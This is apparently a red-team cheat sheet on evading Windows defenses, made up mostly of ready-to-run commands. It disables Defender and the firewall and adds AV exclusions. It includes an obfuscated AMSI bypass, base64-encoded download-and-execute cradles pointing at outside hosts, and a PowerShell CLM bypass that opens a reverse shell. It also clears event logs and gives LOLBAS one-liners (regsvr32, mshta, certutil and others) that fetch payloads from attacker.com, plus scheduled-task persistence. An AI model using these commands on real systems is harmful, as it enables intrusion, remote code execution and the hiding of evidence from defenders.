Defense Evasion

LOLBAS

LOLBAS

AV Evasion

Enumeration

#Windows Defender Status
PS C:\> Get-MpComputerStatus

#List AV Products
PS C:\> Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct | Select-Object displayName, productState
C:\> wmic /namespace:\\root\SecurityCenter2 path AntivirusProduct GET displayName, productState

Disable Security Protections

#Disable Security Protection
PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true

#Set exclusion AV Rules
PS C:\> Add-MpPreference -ExclusionPath "c:\temp" -ExclusionProcess "c:\temp\yourstuffs.exe"

Bypass tools

• DSViper (Works! - 2025-05-01)

• PowerJoker (Works! - 2025-05-01)

Utilities

• donut (Generate Shellcodes)

• InvisibilityCloak (Obfuscation toolkit for C#)

• DInvoke_shellcodeload_CSharp (ShellCodeLoader via DInvoke)

Identify Bad flags (AV/AMSI)

• ThreatCheck

• DefenderCheck

Note: Defender must be enabled on your system, but the real time protection and automatic sample submission features should be disabled.

Techniques

Bypass AV/EDR via DInvoke + Sliver

AMSI

Enumeration

This script contains malicious content and has been blocked by your antivirus software.

#CMD (Windows Defender UID: 2781761E-28E2-4109-99FE-B9D127C57AFE)
C:\Windows\System32> reg query "HKLM\SOFTWARE\Microsoft\AMSI"


#Enumeration option Powershell
PS C:\> Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\AMSI\'
PS C:\> $amsiContext = [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils');if ($amsiContext) { "AMSI is enabled." } else { "AMSI is disabled." }

How to Bypass AMSI

Generates obfuscated PowerShell snippets that break or disable AMSI for the current process.

AMSI.fail

AMSI Bypass:

S`eT-It`em ( ‘V’+’aR’ + ‘IA’ + (‘blE:1’+’q2') + (‘uZ’+’x’) ) ( [TYpE]( “{1}{0}”-F’F’,’rE’ ) ) ; ( Get-varI`A`BLE ( (‘1Q’+’2U’) +’zX’ ) -VaL ).”A`ss`Embly”.”GET`TY`Pe”(( “{6}{3}{1}{4}{2}{0}{5}” -f(‘Uti’+’l’),’A’,(‘Am’+’si’),(‘.Man’+’age’+’men’+’t.’),(‘u’+’to’+’mation.’),’s’,(‘Syst’+’em’) ) ).”g`etf`iElD”( ( “{0}{2}{1}” -f(‘a’+’msi’),’d’,(‘I’+’nitF’+’aile’) ),( “{2}{4}{0}{1}{3}” -f (‘S’+’tat’),’i’,(‘Non’+’Publ’+’i’),’c’,’c,’ )).”sE`T`VaLUE”( ${n`ULl},${t`RuE} )

Bypass reverse shell

Obfuscate the script by modifing the function names, removing the comments and delete the examples section <# Remove Everything here #>

#Encode payload on Linux
echo 'IEX(New-Object Net.WebClient).downloadString("http://10.10.14.3/shell.ps1")' | iconv -t UTF-16LE | base64 -w0;echo

#Encode payload on Windows
PS C:\> $str = 'IEX ((new-object net.webclient).downloadstring("http://nickelviper.com/a"))'
PS C:\> [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

#Execute the payload
PS C:\> powershell.exe powershell -nop -w hidden -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=
PS C:\> powershell.exe -enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADMALwBzAGgAZQBsAGwALgBwAHMAMQAiACkACgA=

Firewall

Enumeration

# Check firewall status
netsh advfirewall show allprofiles
Get-NetFirewallProfile | Select-Object Name, Enabled

# List firewall rules
Get-NetFirewallRule | Where-Object { $_.Enabled -eq 'True' } | Select-Object DisplayName, Direction, Action
netsh advfirewall firewall show rule name=all

Disable Firewall

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
netsh advfirewall set allprofiles state off

Manage firewall rules

#Open port (Inbound outbound)
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=in localport=1234 action=allow
netsh advfirewall firewall add rule name="Allow 1234" protocol=TCP dir=out localport=1234 action=allow
netsh advfirewall firewall add rule name="Allw range ports" protocol=TCP dir=in localport=8000-9000 action=allow

EDR

AV Process List

Security Product	Process Names	Notes
Microsoft Defender	MsMpEng.exe, MSASCui.exe	Built-in AV/EDR
CrowdStrike Falcon	csagent.exe, CSFalconService.exe	Enterprise EDR
Elastic Endpoint	elastic-agent.exe, elastic-endpoint.exe	Open-source EDR
Carbon Black (VMware)	cb.exe, CbDefense.exe	Behavioral EDR
SentinelOne	SentinelAgent.exe	Next-gen AV/EDR
CylancePROTECT	CylanceSvc.exe	AI-based AV
Symantec (Broadcom)	ccSvcHst.exe, Rtvscan.exe	Legacy AV
Trend Micro	TmCCSF.exe	Enterprise AV
Kaspersky	avp.exe	Common in SMEs

Enumeration

Get-Process | Where-Object { 
    $_.ProcessName -match "MsMpEng|csagent|elastic|cb\.exe|Sentinel|Cylance|ccSvcHst|TmCCSF|avp|wazuh|osqueryd|sysmon" 
} | Select-Object Name, Id, Path

Constrained Language Mode

GitHub - padovah4ck/PSByPassCLM: Bypass for PowerShell Constrained Language ModeGitHub

#Get LanguageMode
$executionContext.SessionState.LanguageMode

#Bypass via PSBypassCLM
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.14.9 /rport=443 /U C:\\Users\\amanda\\Documents\\PsBypassCLM.exe

#Bypass by using Powershell Version2
Powershell -version 2

Applocker

Enumeration

Get-AppLockerPolicy -Effective -XML | Out-File "C:\Temp\AppLockerPolicy.xml"

CollectionType

• Exe → Executables .exe

• Script → scripts .ps1, .bat, .vbs, etc.

• Dll → Libraries .dll

• Msi → Installers

• Appx → Modern apps (UWP)

EnforcementMode

• NotConfigured → Not apply

• AuditOnly → Logs events, but does not block.

• Enabled → AppLocker blocks what is not allowed.

✅ If you see AuditOnly, you are free to run without restrictions.

Device Guard

Enumerate

Get-CimInstance -ClassName Win32_DeviceGuard -Namespace root\Microsoft\Windows\DeviceGuard

• RequiredSecurityProperties: (2) (Enabled).

• VirtualizationBasedSecurityStatus: 1 (Enabled).

LSA Protection

Enumeration

reg query HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL
(Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\LSA").RunAsPPL

• 0 = Disable (Vulnerable to mimikatz).

• 1 = Enabled (Protect lsass.exe).

User Account Control (UAC)

Enumeration

# Check if UAC is enabled (1 = Enabled, 0 = Disabled)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).EnableLUA
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA

# Get UAC prompt behavior (0-5 values)
(Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System).ConsentPromptBehaviorAdmin
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin

UAC Values

Registry Key	Value	Effect	Pentester Impact
EnableLUA	1	UAC ON (default)	Blocks silent privilege escalation.
EnableLUA	0	UAC OFF (dangerous)	Easy admin access (no prompts).
ConsentPromptBehaviorAdmin	0	No prompt (auto-elevate if admin).	Best for attackers (no warnings).
ConsentPromptBehaviorAdmin	1	Prompt for credentials (secure desktop).	Needs creds/phishing.
ConsentPromptBehaviorAdmin	2 (Default)	Prompt for confirmation.	User interaction needed.
ConsentPromptBehaviorAdmin	5	Prompt only for non-Windows binaries.	Bypassable with LOLBins.

Event Log Cleansing

wevtutil cl Security
wevtutil cl System
wevtutil cl Application

Writeable paths for non-admins

C:\Windows\Tasks 
C:\Windows\Temp 
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System

LOLBAS Usefull Commands to Bypass Security Solutions

regsvr32.exe – Remote Code Execution (No Disk Write)

Bypasses AMSI, AV, AppLocker

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

• Executes remote scriptlet files (.sct) from memory.

• No file touches disk.

• Evades logging and bypasses AV heuristics.

---

mshta.exe – HTML Application Loader

Bypasses AppLocker and basic AV

mshta http://attacker.com/payload.hta

Or run inline script:

mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -nop -w hidden -enc <BASE64>""")

---

powershell.exe with Base64 Payload

Bypasses basic AV and logs

powershell -nop -w hidden -enc <Base64-Encoded Payload>

• Use with encoded payloads to evade string-based detection.

• Add -version 2 to bypass AMSI and Constrained Language Mode (on older systems).

---

rundll32.exe – DLL Execution or COM Exploit

AppLocker bypass, script execution

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://attacker.com/shell.sct");

Or execute exported function from a malicious DLL:

rundll32.exe payload.dll,ExportedFunction

---

InstallUtil.exe – .NET Binary Execution

Bypasses CLM, AppLocker

InstallUtil.exe /logfile= /LogToConsole=true /U payload.exe

• payload.exe must override the Uninstall() method.

• Can be executed under .NET framework paths.

---

certutil.exe – Download and Decode Payloads

Network evasion, no PowerShell

# Download file from remote server
certutil -urlcache -split -f http://attacker.com/malware.exe evil.exe

# Decode a base64 payload
certutil -decode payload.b64 payload.exe

---

forfiles.exe – Execute Command as File Handler

UAC bypass and execution

forfiles /p C:\ /m notepad.exe /c "cmd /c calc.exe"

---

wmic.exe – Execute Commands Without PowerShell or CMD

wmic process call create "cmd.exe /c calc.exe"

• Executes commands without PowerShell, can evade detection.

---

schtasks.exe – Schedule Execution (Persistence + Evasion)

schtasks /create /tn "Updater" /tr "powershell.exe -enc <payload>" /sc onlogon /ru SYSTEM

• Often whitelisted.

• Useful for persistent or delayed payloads.

---

scriptrunner.exe – Executes Scripts via Signed Binary (SCCM)

scriptrunner.exe -appvscript payload.bat

• Executes scripts using a trusted Microsoft-signed binary.

---

msbuild.exe – Inline C# Payload Execution

<!-- Save as payload.xml -->
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Exec">
    <ClassExample />
  </Target>
  <UsingTask TaskName="ClassExample" TaskFactory="CodeTaskFactory"
    AssemblyFile="C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
    <Task>
      <Code Type="Class" Language="cs">
        <![CDATA[
          using System;
          using Microsoft.Build.Framework;
          using Microsoft.Build.Utilities;
          public class ClassExample : Task {
            public override bool Execute() {
              System.Diagnostics.Process.Start("calc.exe");
              return true;
            }
          }
        ]]>
      </Code>
    </Task>
  </UsingTask>
</Project>

Then run:

msbuild.exe payload.xml